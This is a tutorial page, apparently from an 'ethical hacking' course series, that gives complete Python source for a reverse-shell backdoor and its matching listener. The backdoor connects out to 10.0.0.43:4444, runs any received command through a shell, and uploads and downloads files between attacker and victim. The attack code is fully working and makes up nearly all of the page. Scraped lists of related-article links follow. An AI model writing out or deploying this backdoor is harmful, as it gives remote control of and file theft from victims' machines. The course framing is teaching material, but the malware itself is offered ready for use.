File Upload:

  • A file is a series of characters.
  • Uploading a file is the opposite of downloading a file.
  • Therefore to transfer a file we need to:
    • 1. Read the file as a sequence of characters.
    • 2. Send this sequence of characters.
    • 3. Create a new empty file at the destination.
    • 4. Store the transferred sequence of characters in the new file.

Server Side - Listener code

#!/usr/bin/env python

import socket

import json

import base64

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command)

        if command[0] == "exit":

            self.connection.close()

            exit()

        return self.reliable_receive()

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Download successful."

    def run(self):

        while True:

            command = input(">> ")

            command = command.split(" ")

            if command[0] == "upload":

                file_content = self.read_file(command[1]).decode()

                command.append(file_content)

            result = self.execute_remotely(command)

            if command[0] == "download":

                result = self.write_file(command[1], result)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            if command[0] == "exit":

                self.connection.close()

                exit()

            elif command[0] == "cd" and len(command) > 1:

                command_result = self.change_working_directory_to(command[1])

            elif command[0] == "upload":

                command_result = self.write_file(command[1], command[2])

            elif command[0] == "download":

                command_result = self.read_file(command[1]).decode()

            else:

                command_result = self.execute_system_command(command).decode()

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Upload files from Kali Linux to the target client.

Python Ethical Hacking - BACKDOORS(6)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  4. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. 打个总结:Web性能优化

    前段时间优化一个公司历史老项目的Web性能,却引出了一系列的问题,让我反思良多. 我通过Chrome的Lighthouse工具可以看出一些性能参数和问题反馈,我逐一对其进行优化. 根据资源请求的不同, ...

  2. elasticSearch中集群状态的guan'l

    es中集群出现上面的问题一般是磁盘空间不够引起的,就是node节点所在的磁盘空间不足引起的 es整个集群放在c盘,都快满了 说明es的磁盘已经快被使用完了,我们可以临时更新下磁盘空间大小 修改 ES分 ...

  3. 一起玩转微服务(12)——揭密starter

    介绍 Spring Boot的starter主要用来简化依赖用的,对于企业级开发中的与第三方的集成,可以通过一段简单的配置来完成,这样开发人员无需再对包依赖的问题头疼.Spring Boot为我们提供 ...

  4. Lens —— 最炫酷的 Kubernetes 桌面客户端

    原文链接:https://fuckcloudnative.io/posts/lens/ Kubernetes 的桌面客户端有那么几个,曾经 Kubernetic 应该是最好用的,但最近有个叫 Lens ...

  5. 计算机网络之ARP协议

    ARP ARP(Address Resolution Protocol),即地址解析协议,是根据IP地址解析物理地址的一个TCP/IP协议.主机将包含目标IP地址信息的ARP请求广播到网络中的所有主机 ...

  6. Shader专题:卡通着色(一)控制颜色的艺术

    什么是 Shader? 关于什么是 Shader ,各种百科各种教程都有说过,但是今天我们就从一个另一个角度去试着理解什么是 Shader? 我们先看下 Shade 的英文意思,如下: v.给...遮 ...

  7. Hexo快速构建个人小站-Fulid主题下添加Valine评论系统(三)

    Hexo目录: Hexo快速构建个人小站-Hexo初始化和将项目托管在Github(一) Hexo快速构建个人小站-自定义域名和自定义主题(二) 背景交代: 前面两章完成了Hexo的初始化和部分自定义 ...

  8. (私人收藏)[开发必备]最全Java离线快速查找手册(可查询可学习,带实例)

    (私人收藏)[开发必备]最全Java离线快速查找手册(可查询可学习,带实例) https://pan.baidu.com/s/1L54VuFwCdKVnQGVc8vD1TQnwmj java手册 Ja ...

  9. HTML5(二)音频视频画布

    HTML5 Audio(音频) 定义和用法 <audio src="someaudio.wav" controls="controls"> 您的浏览 ...

  10. videojs兼容ie8

    从网上找到很多这个videojs兼容ie8的解决方案,一个一个的试,最后发现没有一个是靠谱的.我好无奈啊…… 先看图(ie上访问必须是线上地址) 看代码: <!DOCTYPE html> ...